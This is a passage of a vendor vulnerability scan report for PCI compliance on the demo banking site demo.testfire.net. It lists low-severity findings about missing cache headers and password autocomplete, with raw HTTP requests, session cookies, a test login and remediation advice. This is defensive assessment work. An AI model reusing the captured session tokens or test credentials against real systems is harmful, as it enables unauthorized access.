JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

249 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/sendFeedback


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 594 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Request: POST http://demo.testfire.net/sendFeedback HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

250 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 595 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

251 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/login.jsp


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 596 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: GET http://demo.testfire.net/login.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

252 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/index.jsp


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/index.jsp
No Caching Directives Found.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 597 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://65.61.137.117:8443/index.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

253 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/sendFeedback


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 598 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DetectionDetails: Form Caching Vulnerability Found
POST - https://65.61.137.117:8443/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: POST https://65.61.137.117:8443/sendFeedback HTTP/1.1


Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

254 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/index.jsp?content=business.htm


directives for pages having Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 599 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

forms Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://65.61.137.117/index.jsp?content=business.htm


HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 600 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

255 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://65.61.137.117/ HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 601 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

256 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/doLogin


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://65.61.137.117/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: POST http://65.61.137.117/doLogin HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 602 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

257 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/index.jsp?content=personal.htm


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 603 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://65.61.137.117/index.jsp?content=personal.htm


HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

258 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/login.jsp


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 604 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: GET http://demo.testfire.net:8080/login.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 605 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

259 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/feedback.jsp


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form name="cmt" method="post" action="sendFeedback">


<input type="hidden" name="cfile" value="comments.txt">
<input name="name" size="25" type="text" value="">
<input name="email_addr" type="text" size="25">
<input name="subject" size="25">
<input type="submit" value=" Submit " name="submit">
<input type="reset" value=" Clear Form " name="reset">

Request: GET https://65.61.137.117/feedback.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 606 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

260 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/index.jsp?content=business.ht


directives for pages having m
forms Port: tcp/8443

Data submitted via forms present on pages without caching directives,


can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 607 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Request: GET
https://demo.testfire.net:8443/index.jsp?content=business.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

261 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 608 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

262 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/index.jsp?content=inside_contact.ht


directives for pages having m
forms Port: tcp/443

Data submitted via forms present on pages without caching directives,


can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 609 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
https://demo.testfire.net/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

263 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/doLogin


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 610 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: POST http://demo.testfire.net/doLogin HTTP/1.1


Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 611 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

264 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/sendFeedback


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://65.61.137.117/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: POST http://65.61.137.117/sendFeedback HTTP/1.1


Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Origin: http://65.61.137.117

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 612 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

265 Auto-Completion Enabled 1.2 Low Pass URL: https://65.61.137.117/login.jsp


for Password Fields Port: tcp/443

The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.

CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 613 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
org/En/How_to_Turn_Off_Form_Autocompletion

Evidence:
Form Name: login
Action: https://65.61.137.117:443/doLogin
Fields: passw (password)
Location: https://65.61.137.117/login.jsp

Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".

If this is a vendor application, contact the vendor for an updated


version of the application or guidance on addressing this issue.

266 Auto-Completion Enabled 1.2 Low Pass URL: http://65.61.137.117/login.jsp


for Password Fields Port: tcp/80

The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.

CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Application: apache:tomcat

Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 614 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n

Evidence:
Form Name: login
Action: http://65.61.137.117:80/doLogin
Fields: passw (password)
Location: http://65.61.137.117/login.jsp

Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".

If this is a vendor application, contact the vendor for an updated


version of the application or guidance on addressing this issue.

